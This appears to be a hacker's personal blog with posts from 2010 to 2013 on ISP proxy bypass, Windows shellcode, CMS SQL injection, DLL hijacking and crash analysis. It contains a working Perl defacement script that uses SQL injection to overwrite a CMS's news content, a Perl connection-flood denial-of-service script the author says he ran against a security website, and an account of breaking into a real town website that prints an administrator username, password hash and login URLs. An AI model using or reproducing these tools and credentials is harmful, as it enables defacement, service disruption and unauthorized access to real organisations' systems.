Wednesday, July 17, 2013

ISP access restriction bypass via web cache proxy

today i want to explain a vulnerbility that i discovered in some isp web cache proxy's in iran.
i presented this vulnerability in first sharif university cyber security awareness conference
 ( http://cert.sharif.edu)
by using this vulnerability when isp closes your acount , you can brows web pages again !


what is web cache proxy ?
A web cache is a mechanism for the temporary storage (caching) of web documents, such as HTML pages and images, to reduce bandwidth usage, server load, and perceived lag. A web cache stores copies of documents passing through it; subsequent requests may be satisfied from the cache if certain conditions are met

dns redirect page
When the ISP's DNS server receives a request for a name that is not recognized or is unavailable, the DNS server returns the IP address of a search page to the client. When the client is using a web browser, this will display a search page that contains possible suggestions on the proper address and a small explanation of the error. These search pages often contain advertising that is paid to the ISP.


but how this vulnerability works ?!
 in this case isp restrics our access  to all web servers except one ,  and what is this one ?!!
this server is the same web cache proxy ! we have access to the ip of web cache proxy but any http request can be executed over the ip of web cache proxy !


for example i want to see a web page ( like farsnews.com ) and now i must make an http request over the ip of web cache(dns redirect server ) that i have access to it :


and you can see the web page is loaded successfully !

i tested this vulnerbility in largest private ISP in Iran (parsonline.com) and recorded a demo that you can see here :

the vulnerability is now fixed on pars online but another isp may be affected !

Tuesday, May 31, 2011

simple windows shellcoding


shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).

An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.

In this post i want to show a simple way to making shellcodes under windows operating system

debuggers can help us to a fast shellcoding and test our shellcodes. do you remember exe file injection method ? in this method we must find a free code area in the exe file ,called code cave.
in the code cave we can insert assembly instructions , and run it! after inserting our codes, we must change the address of instruction pointer to the beginning of our codes address

i want make a MessageBox shellcode that shows d3c0der !

for conversion your message (that you want show by shellcode) to hex ,you can use this site :
http://centricle.com/tools/ascii-hex/

this is an axample of  conversion the " d3c0der " word:





Here is a simple code in assembly language to call the MessageBox function and print a word:

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx

mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72

push 0
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
push 0
mov eax,user32.messageboxa
call eax







now it's time to find a codecave area. you just need to look at the end of a binary file:


now i insert my codes into the codecave:


the first instruction that i use is " xor eax,eax "
and this addres is : 01010D47 ( we wiil use it for changing EIP )

take a look at the registers window , and look the instruction pointer address


just follow that address:


and replace the instruction with "JMP 01010D47"


now  run the program , you can see the d3c0der message.


lets make it Null-free!

Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When a null-terminated string is copied, it will be copied up to and including the first null but subsequent bytes of the shellcode will not be processed. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it incapable of running successfully.

To produce null-free shellcode from shellcode that contains null bytes, one can substitute machine instructions that contain zeroes with instructions that have the same effect but are free of nulls. For example, on the IA-32 architecture one could replace this instruction:
push 0

which contains zeroes as part of the literal with these instructions:
xor ecx,ecx
push ecx

and our final shellcode is :

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov byte ptr ss:[ebp-7],64
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
xor ecx,ecx
push ecx
lea ebx,dword ptr ss:[ebp-7]
push ebx
lea ecx,dword ptr ss:[ebp-7]
push ecx
xor ecx,ecx
push ecx
mov eax,user32.messageboxa
call eax


good luck!

Sunday, February 6, 2011

how hillsboro beach website hacked ?

 few weeks ago i read a news on foxnews about an american website :

http://www.foxnews.com/scitech/2011/01/18/florida-communitys-website-targeted-iranian-hackers/

i logged in website and found the bug , in this post i want to show vulnerability of  this site :d

 let's go !
first , home page :

            sql  error :

            number of selected column is incorrect :

           mysql version :


           username and password :d :


user : tohbadministrator
pass : 481a91595db92d57

and login pages :
http://townofhillsborobeach.com/cmsadmin/index.php
http://townofhillsborobeach.com/ControlPanel/index.xsl

i have a message for foxnews , they are not iranian pro hackers ! they are some basiji script kiddies . . .
good luck :p

Tuesday, January 4, 2011

ImgBurn 2.4.0.0 dll hijack vulnerability

I have found a vulnerability in ImgBurn that could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully qualified path to a dynamic-linked library (dwmapi.dll) when running on Microsoft Windows. By persuading a victim to open a specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a specially-crafted library to execute arbitrary code on the system.







IN THE NEWS :

http://www.governmentsecurity.org/latest-security-news/critical-vulnerability-in-imgburn.html
http://www.livehacking.com/2011/01/05/unpatched-hole-in-imgburn-disk-burning-application/
http://www.h-online.com/security/news/item/Unpatched-hole-in-ImgBurn-disk-burning-application-1163003.html
http://forums.cnet.com/7723-6132_102-512542.html
http://www.net-security.org/secworld.php?id=10397
http://www.esecurityplanet.com/headlines/article.php/3919281/Security-Vulnerability-Found-in-ImgBurn.htm
http://www.naked-security.com/nsa/185411.htm
http://www.zerodaylab.com/vulnerabilities/CVE-2011/CVE-2011-0403.html




    Thursday, December 16, 2010

    DorsaCms SQL Injection Vulnerability

    Dorsa is a cms that have certificate of security

    u can see certificate of security from this link :
    http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other

    but  i found  a blind SQL Injection Vulnerability in this CMS 

    http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt

    exploit code(tested on windows xp ) :


    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    system('title DorsaCMS Defacer');
    print q{
    ===================================================
    -= ** =-
    DorsaCMS Defacer

    [+] Coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
    -= ** =-
    ===================================================


    };

    use HTTP::Request;
    use LWP::UserAgent;



    print "~# Target : ";
    $site=<STDIN>;
    chomp $site;
    print "~# PageID : ";
    $id=<STDIN>;
    chomp $id;
     print "~# Deface Text : ";
    $def=<STDIN>;
    chomp $def;

    if ( $site !~ /^http:/ ) {
    $site = 'http://' . $site;
    }
    if ( $site !~ /\/$/ ) {
    $site = $site . '/';
    }
    print "\n";

    print "->hacking : $site\n";




    @path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

    foreach $ways(@path1){

    $final=$site.$ways;

    my $req=HTTP::Request->new(GET=>$final);
    my $ua=LWP::UserAgent->new();
    $ua->timeout(30);
    my $response=$ua->request($req);


    }

    print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";




    ##
    # By d3c0der
    ##


    .

    Thursday, December 2, 2010

    simple d.o.s attacker

    Hi,
    I wrote a simple perl denial of service script 

    I've got it working on windows xp with active perl
    i used this script to attacking the my sql port of a security website , and here is the result ;)



    please use this code FOR EDUCATIONAL PURPOSES  ONLY

    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    print q{
    ===================================================
    -= ** =-
    AttackerZ d.o.s Attacker - version 1.0

    [+] coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground TM  =>  wwW.Attackerz.iR
    -= ** =-

    ===>  FOR EDUCATIONAL PURPOSES  ONLY <===

    ===================================================


    };

    use IO::Socket;

    print "Host: ";{
    chop ($host = <stdin>);
    print "Port: ";
    chop ($port = <stdin>);
    print "SYN Requests to send : ";
    chop ($num= <stdin>);
    }
    if(defined($ARGV[2])){
    $host = $ARGV[0];
    $port = $ARGV[1];
    $num = $ARGV[2];
    }
    for ($i=0; $i<$num; $i++)
    {
    $len = length $form;
    $sock = IO::Socket::INET->new (
    PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp') || die "$! sorry ! Can't Connect";
    syswrite STDOUT, "[+]SYN Request: $i\n";
    }
    $local_time = localtime();

    $login = getlogin();
    print " hello $login , your attack finish at $local_time\n";

    print "All packets sent to $host\n";

     print "Press any key To exit...";
    $end = <STDIN>;
    chop ($end);

    Wednesday, November 24, 2010

    !exploitable Crash Analyzer

    !exploitable (pronounced "bang exploitable") Crash Analyzer is a plugin for the Windows Debugger that parses your crash logs and gives you two important pieces of information. First, it will collate all of your crashes and determine exactly how many there actually are. So for example, out of 60 crash reports, there may only be 2 or 3 actual problems.


    0:006> g
    (19ec.1a0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
    eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
    41414141 ??              ???
    0:001> !load msec.dll
    0:001> !exploitable
    Exploitability Classification: EXPLOITABLE
    Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at 
    Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)
    
    Access violations at the instruction pointer are exploitable if not near NULL.


    The second thing it does is look at the type of crash and try to determine if the error is something that could be exploited by a malicious hacker. This means that more junior employees can work these bug issues without taking the time of more senior examiners. Jason Shirk from the Security Core team joined us to take a look at !exploitable. To download the app, go to: http://www.codeplex.com/msecdbg.

    download video :